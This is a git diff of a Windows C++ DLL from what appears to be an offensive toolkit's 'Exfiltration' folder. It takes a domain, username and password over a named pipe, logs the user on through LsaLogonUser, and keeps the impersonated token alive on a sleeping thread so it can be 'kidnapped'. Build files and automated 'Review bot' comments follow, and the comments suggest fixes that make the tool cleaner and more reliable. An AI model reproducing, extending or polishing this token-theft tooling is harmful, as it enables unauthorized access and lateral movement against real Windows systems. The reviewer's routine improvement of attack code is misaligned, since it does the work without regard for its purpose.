+ PLSA_STRING authPackageName = new LSA_STRING();
+ authPackageName->Buffer = authPackageBuf;
+ authPackageName->Length = (USHORT)strlen(authPackageBuf);
+ authPackageName->MaximumLength = (USHORT)strlen(authPackageBuf);
+ status = LsaLookupAuthenticationPackage(hLSA, authPackageName, &authPackage);
+ if (status != 0)
+ {
+ int winError = LsaNtStatusToWinError(status);
+ string errorMsg = "Call to LsaLookupAuthenticationPackage failed. Error code: " + to_string(winError);
+ WriteErrorToPipe(errorMsg, pipe);
+ return;
+ }
+
+ //Get TokenSource
+ HANDLE hProcess = GetCurrentProcess();//todo
+ HANDLE procToken = NULL;
+ success = OpenProcessToken(hProcess, TOKEN_ALL_ACCESS, &procToken);
+ if (!success)
+ {
+ DWORD errorCode = GetLastError();
+ string errorMsg = "Call to OpenProcessToken failed. Errorcode: " + to_string(errorCode);
+ WriteErrorToPipe(errorMsg, pipe);
+ return;
+ }
+
+ TOKEN_SOURCE tokenSource = {};
+ DWORD realSize = 0;
+ success = GetTokenInformation(procToken, TokenSource, &tokenSource, sizeof(tokenSource), &realSize);
+ if (!success)
+ {
+ string errorMsg = "Call to GetTokenInformation failed.";
+ WriteErrorToPipe(errorMsg, pipe);
+ return;
+ }
+
+ //Misc out parameters
+ PVOID profileBuffer = NULL;
+ ULONG profileBufferSize = 0;
+ LUID loginId;
+ HANDLE token = NULL;
+ QUOTA_LIMITS quotaLimits;
+ NTSTATUS subStatus = 0;
+
+ //Log on the user
+ status = LsaLogonUser(hLSA,
+ &originName,
+ static_cast<SECURITY_LOGON_TYPE>(logonType),
+ authPackage,
+ authBuffer,
+ authBufferSize,
+ 0,
+ &tokenSource,
+ &profileBuffer,
+ &profileBufferSize,
+ &loginId,
+ &token,
+ &quotaLimits,
+ &subStatus);
+
+ if (status != 0)
+ {
+ NTSTATUS winError = LsaNtStatusToWinError(status);
+ string errorMsg = "Error calling LsaLogonUser. Error code: " + to_string(winError);
+ WriteErrorToPipe(errorMsg, pipe);
+ return;
+ }
+
+
+ //Impersonate the token with the current thread so it can be kidnapped
+ ImpersonateLoggedOnUser(token);
+
+ //Put the thread to sleep so it can be impersonated
+ string successMsg = "Logon succeeded, impersonating the token so it can be kidnapped and starting an infinite loop with the thread.";
+ WriteErrorToPipe(successMsg, pipe);
+ HANDLE permenantSleep = CreateMutex(NULL, false, NULL);
+ while(1)
+ {
+ Sleep(MAXDWORD);
+ }
+
+ return;
+}
+
+
+PVOID CreateKerbLogonStructure(const wchar_t* domain, const wchar_t* username, const wchar_t* password, DWORD* size)
+{
+ size_t wcharSize = sizeof(wchar_t);
+
+ size_t totalSize = sizeof(KERB_INTERACTIVE_LOGON) + ((lstrlenW(domain) + lstrlenW(username) + lstrlenW(password)) * wcharSize);
+ KERB_INTERACTIVE_LOGON* ntlmLogon = (PKERB_INTERACTIVE_LOGON)(new BYTE[totalSize]);
+ size_t writeAddress = (UINT_PTR)ntlmLogon + sizeof(KERB_INTERACTIVE_LOGON);
+
+ ntlmLogon->MessageType = KerbInteractiveLogon;
+ writeAddress += WriteUnicodeString(domain, &(ntlmLogon->LogonDomainName), (PVOID)writeAddress);
+ writeAddress += WriteUnicodeString(username, &(ntlmLogon->UserName), (PVOID)writeAddress);
+ writeAddress += WriteUnicodeString(password, &(ntlmLogon->Password), (PVOID)writeAddress);
+
+ *size = (DWORD)totalSize; //If the size is bigger than a DWORD, there is a gigantic bug somewhere.
+ return ntlmLogon;
+}
+
+
+PVOID CreateNtlmLogonStructure(const wchar_t* domain, const wchar_t* username, const wchar_t* password, DWORD* size)
+{
+ size_t wcharSize = sizeof(wchar_t);
+
+ size_t totalSize = sizeof(MSV1_0_INTERACTIVE_LOGON) + ((lstrlenW(domain) + lstrlenW(username) + lstrlenW(password)) * wcharSize);
+ MSV1_0_INTERACTIVE_LOGON* ntlmLogon = (PMSV1_0_INTERACTIVE_LOGON)(new BYTE[totalSize]);
+ size_t writeAddress = (UINT_PTR)ntlmLogon + sizeof(MSV1_0_INTERACTIVE_LOGON);
+
+ ntlmLogon->MessageType = MsV1_0InteractiveLogon;
+ writeAddress += WriteUnicodeString(domain, &(ntlmLogon->LogonDomainName), (PVOID)writeAddress);
+ writeAddress += WriteUnicodeString(username, &(ntlmLogon->UserName), (PVOID)writeAddress);
+ writeAddress += WriteUnicodeString(password, &(ntlmLogon->Password), (PVOID)writeAddress);
+
+ *size = (DWORD)totalSize; //If the size is bigger than a DWORD, there is a gigantic bug somewhere.
+ return ntlmLogon;
+}
+
+//Returns the amount of bytes written.
+size_t WriteUnicodeString(const wchar_t* str, UNICODE_STRING* uniStr, PVOID address)
+{
+ size_t size = lstrlenW(str) * sizeof(wchar_t);
+ uniStr->Length = (USHORT)size;
+ uniStr->MaximumLength = (USHORT)size;
+ uniStr->Buffer = (PWSTR)address;
+ memcpy(address, str, size);
+ return size;
+}
+
+void WriteErrorToPipe(string errorMsg, HANDLE pipe)
+{
+ const char* error = errorMsg.c_str();
+ DWORD bytesWritten = 0;
+ WriteFile(pipe, error, strlen(error), &bytesWritten, NULL);
+} \ No newline at end of file
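Review bot: Every early `return` in `VoidFunc` after the `CreateFile` succeeds leaks the pipe handle and the three `new wchar_t[]` buffers, and on the success path `password` and `authBuffer` — both holding the plaintext password — stay resident in the host process for as long as the thread sits in the `while(1)` loop. Wipe and free the logon structure and the pipe-supplied strings directly after the `LsaLogonUser` call (before the status check, since the cleanup does not depend on it), and `CloseHandle(pipe)` on each failure path and once the success message has been written. Two smaller points in the same function: `bytesToRead` is computed and never used (the reads pass `strSize` and `strSize-2` as byte counts instead), and `ReadFile(pipe, &logonType, 1, …)` overwrites only the low byte of a `USHORT`, so `logonType` and `authPackageToUse` should be declared as single bytes so the read size matches the type. The `permenantSleep` mutex handle is never used or closed; `Sleep(MAXDWORD)` already blocks indefinitely, so that line can be dropped.
```cpp
    // … unchanged: LsaLogonUser call …

    // Both the logon structure and the pipe-supplied strings hold the plaintext
    // password; wipe and free them as soon as LSA has consumed them.
    SecureZeroMemory(authBuffer, authBufferSize);
    delete[] static_cast<BYTE*>(authBuffer);
    SecureZeroMemory(password, strSize * sizeof(wchar_t));
    delete[] password;
    delete[] username;
    delete[] domain;
    delete authPackageName;
    CloseHandle(procToken);
    if (profileBuffer != NULL)
    {
        LsaFreeReturnBuffer(profileBuffer);
    }

    // … unchanged: status check, ImpersonateLoggedOnUser, success message …
    CloseHandle(pipe);
    // … unchanged: sleep loop …
```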
diff --git a/Exfiltration/LogonUser/LogonUser/logon/logon.vcxproj b/Exfiltration/LogonUser/LogonUser/logon/logon.vcxproj
new file mode 100644
index 0000000..7fb078b
--- /dev/null
+++ b/Exfiltration/LogonUser/LogonUser/logon/logon.vcxproj
@@ -0,0 +1,176 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+ <ItemGroup Label="ProjectConfigurations">
+ <ProjectConfiguration Include="Debug|Win32">
+ <Configuration>Debug</Configuration>
+ <Platform>Win32</Platform>
+ </ProjectConfiguration>
+ <ProjectConfiguration Include="Debug|x64">
+ <Configuration>Debug</Configuration>
+ <Platform>x64</Platform>
+ </ProjectConfiguration>
+ <ProjectConfiguration Include="Release|Win32">
+ <Configuration>Release</Configuration>
+ <Platform>Win32</Platform>
+ </ProjectConfiguration>
+ <ProjectConfiguration Include="Release|x64">
+ <Configuration>Release</Configuration>
+ <Platform>x64</Platform>
+ </ProjectConfiguration>
+ </ItemGroup>
+ <PropertyGroup Label="Globals">
+ <ProjectGuid>{D248AC1C-B831-42AE-835A-1B98B2BF9DF3}</ProjectGuid>
+ <Keyword>Win32Proj</Keyword>
+ <RootNamespace>logon</RootNamespace>
+ </PropertyGroup>
+ <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+ <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+ <ConfigurationType>DynamicLibrary</ConfigurationType>
+ <UseDebugLibraries>true</UseDebugLibraries>
+ <PlatformToolset>v110</PlatformToolset>
+ <CharacterSet>Unicode</CharacterSet>
+ </PropertyGroup>
+ <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+ <ConfigurationType>DynamicLibrary</ConfigurationType>
+ <UseDebugLibraries>true</UseDebugLibraries>
+ <PlatformToolset>v110</PlatformToolset>
+ <CharacterSet>Unicode</CharacterSet>
+ </PropertyGroup>
+ <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+ <ConfigurationType>DynamicLibrary</ConfigurationType>
+ <UseDebugLibraries>false</UseDebugLibraries>
+ <PlatformToolset>v110</PlatformToolset>
+ <WholeProgramOptimization>true</WholeProgramOptimization>
+ <CharacterSet>Unicode</CharacterSet>
+ </PropertyGroup>
+ <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+ <ConfigurationType>DynamicLibrary</ConfigurationType>
+ <UseDebugLibraries>false</UseDebugLibraries>
+ <PlatformToolset>v110</PlatformToolset>
+ <WholeProgramOptimization>true</WholeProgramOptimization>
+ <CharacterSet>Unicode</CharacterSet>
+ </PropertyGroup>
+ <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+ <ImportGroup Label="ExtensionSettings">
+ </ImportGroup>
+ <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+ <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+ </ImportGroup>
+ <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
+ <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+ </ImportGroup>
+ <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+ <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+ </ImportGroup>
+ <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
+ <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+ </ImportGroup>
+ <PropertyGroup Label="UserMacros" />
+ <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+ <LinkIncremental>true</LinkIncremental>
+ </PropertyGroup>
+ <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+ <LinkIncremental>true</LinkIncremental>
+ </PropertyGroup>
+ <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+ <LinkIncremental>false</LinkIncremental>
+ </PropertyGroup>
+ <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+ <LinkIncremental>false</LinkIncremental>
+ </PropertyGroup>
+ <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+ <ClCompile>
+ <PrecompiledHeader>Use</PrecompiledHeader>
+ <WarningLevel>Level3</WarningLevel>
+ <Optimization>Disabled</Optimization>
+ <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;LOGON_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+ </ClCompile>
+ <Link>
+ <SubSystem>Windows</SubSystem>
+ <GenerateDebugInformation>true</GenerateDebugInformation>
+ <AdditionalDependencies>secur32.lib;%(AdditionalDependencies)</AdditionalDependencies>
+ </Link>
+ </ItemDefinitionGroup>
+ <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+ <ClCompile>
+ <PrecompiledHeader>Use</PrecompiledHeader>
+ <WarningLevel>Level3</WarningLevel>
+ <Optimization>Disabled</Optimization>
+ <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;LOGON_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+ </ClCompile>
+ <Link>
+ <SubSystem>Windows</SubSystem>
+ <GenerateDebugInformation>true</GenerateDebugInformation>
+ <AdditionalDependencies>secur32.lib;%(AdditionalDependencies)</AdditionalDependencies>
+ </Link>
+ </ItemDefinitionGroup>
+ <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+ <ClCompile>
+ <WarningLevel>Level3</WarningLevel>
+ <PrecompiledHeader>Use</PrecompiledHeader>
+ <Optimization>MaxSpeed</Optimization>
+ <FunctionLevelLinking>true</FunctionLevelLinking>
+ <IntrinsicFunctions>true</IntrinsicFunctions>
+ <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;LOGON_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+ <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+ </ClCompile>
+ <Link>
+ <SubSystem>Windows</SubSystem>
+ <GenerateDebugInformation>true</GenerateDebugInformation>
+ <EnableCOMDATFolding>true</EnableCOMDATFolding>
+ <OptimizeReferences>true</OptimizeReferences>
+ <AdditionalDependencies>secur32.lib;%(AdditionalDependencies)</AdditionalDependencies>
+ </Link>
+ </ItemDefinitionGroup>
+ <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+ <ClCompile>
+ <WarningLevel>Level3</WarningLevel>
+ <PrecompiledHeader>Use</PrecompiledHeader>
+ <Optimization>MaxSpeed</Optimization>
+ <FunctionLevelLinking>true</FunctionLevelLinking>
+ <IntrinsicFunctions>true</IntrinsicFunctions>
+ <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;LOGON_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+ <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+ </ClCompile>
+ <Link>
+ <SubSystem>Windows</SubSystem>
+ <GenerateDebugInformation>true</GenerateDebugInformation>
+ <EnableCOMDATFolding>true</EnableCOMDATFolding>
+ <OptimizeReferences>true</OptimizeReferences>
+ <AdditionalDependencies>secur32.lib;%(AdditionalDependencies)</AdditionalDependencies>
+ </Link>
+ </ItemDefinitionGroup>
+ <ItemGroup>
+ <Text Include="ReadMe.txt" />
+ </ItemGroup>
+ <ItemGroup>
+ <ClInclude Include="stdafx.h" />
+ <ClInclude Include="targetver.h" />
+ </ItemGroup>
+ <ItemGroup>
+ <ClCompile Include="dllmain.cpp">
+ <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">false</CompileAsManaged>
+ <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</CompileAsManaged>
+ <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+ </PrecompiledHeader>
+ <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+ </PrecompiledHeader>
+ <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</CompileAsManaged>
+ <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</CompileAsManaged>
+ <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+ </PrecompiledHeader>
+ <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+ </PrecompiledHeader>
+ </ClCompile>
+ <ClCompile Include="logon.cpp" />
+ <ClCompile Include="stdafx.cpp">
+ <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
+ <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
+ <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
+ <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
+ </ClCompile>
+ </ItemGroup>
+ <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+ <ImportGroup Label="ExtensionTargets">
+ </ImportGroup>
+</Project> \ No newline at end of file
diff --git a/Exfiltration/LogonUser/LogonUser/logon/logon.vcxproj.filters b/Exfiltration/LogonUser/LogonUser/logon/logon.vcxproj.filters
new file mode 100644
index 0000000..b63ba3c
--- /dev/null
+++ b/Exfiltration/LogonUser/LogonUser/logon/logon.vcxproj.filters
@@ -0,0 +1,39 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+ <ItemGroup>
+ <Filter Include="Source Files">
+ <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
+ <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
+ </Filter>
+ <Filter Include="Header Files">
+ <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
+ <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
+ </Filter>
+ <Filter Include="Resource Files">
+ <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
+ <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
+ </Filter>
+ </ItemGroup>
+ <ItemGroup>
+ <Text Include="ReadMe.txt" />
+ </ItemGroup>
+ <ItemGroup>
+ <ClInclude Include="stdafx.h">
+ <Filter>Header Files</Filter>
+ </ClInclude>
+ <ClInclude Include="targetver.h">
+ <Filter>Header Files</Filter>
+ </ClInclude>
+ </ItemGroup>
+ <ItemGroup>
+ <ClCompile Include="stdafx.cpp">
+ <Filter>Source Files</Filter>
+ </ClCompile>
+ <ClCompile Include="logon.cpp">
+ <Filter>Source Files</Filter>
+ </ClCompile>
+ <ClCompile Include="dllmain.cpp">
+ <Filter>Source Files</Filter>
+ </ClCompile>
+ </ItemGroup>
+</Project> \ No newline at end of file
diff --git a/Exfiltration/LogonUser/LogonUser/logon/stdafx.cpp b/Exfiltration/LogonUser/LogonUser/logon/stdafx.cpp
new file mode 100644
index 0000000..696fbfb
--- /dev/null
+++ b/Exfiltration/LogonUser/LogonUser/logon/stdafx.cpp
@@ -0,0 +1,8 @@
+// stdafx.cpp : source file that includes just the standard includes
+// logon.pch will be the pre-compiled header
+// stdafx.obj will contain the pre-compiled type information
+
+#include "stdafx.h"
+
+// TODO: reference any additional headers you need in STDAFX.H
+// and not in this file
diff --git a/Exfiltration/LogonUser/LogonUser/logon/stdafx.h b/Exfiltration/LogonUser/LogonUser/logon/stdafx.h
new file mode 100644
index 0000000..d8612f0
--- /dev/null
+++ b/Exfiltration/LogonUser/LogonUser/logon/stdafx.h
@@ -0,0 +1,25 @@
+// stdafx.h : include file for standard system include files,
+// or project specific include files that are used frequently, but
+// are changed infrequently
+//
+
+#pragma once
+
+#include "targetver.h"
+
+#define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
+// Windows Header Files:
+#include "targetver.h"
+#include <stdio.h>
+#include <tchar.h>
+#include <iostream>
+#include <string>
+#include <fstream>
+#include <ostream>
+#include <mutex>
+#include <Windows.h>
+#include <NTSecAPI.h>
+
+
+
+// TODO: reference additional headers your program requires here
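Review bot: `#include "targetver.h"` appears twice in this header, once before the `WIN32_LEAN_AND_MEAN` define and again under the "Windows Header Files" comment; the second include is redundant since targetver.h is guarded by `#pragma once`, and the duplicate makes the intended include order harder to read. Drop the second `#include "targetver.h"` on the line after the "Windows Header Files:" comment and keep the first, which already precedes `<Windows.h>` as the SDK version macros require. The trailing "TODO: reference additional headers" wizard comment can also be removed now that the project's actual includes (`<mutex>`, `<NTSecAPI.h>`) are listed here.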
diff --git a/Exfiltration/LogonUser/LogonUser/logon/targetver.h b/Exfiltration/LogonUser/LogonUser/logon/targetver.h
new file mode 100644
index 0000000..87c0086
--- /dev/null
+++ b/Exfiltration/LogonUser/LogonUser/logon/targetver.h
@@ -0,0 +1,8 @@
+#pragma once
+
+// Including SDKDDKVer.h defines the highest available Windows platform.
+
+// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
+// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
+
+#include <SDKDDKVer.h>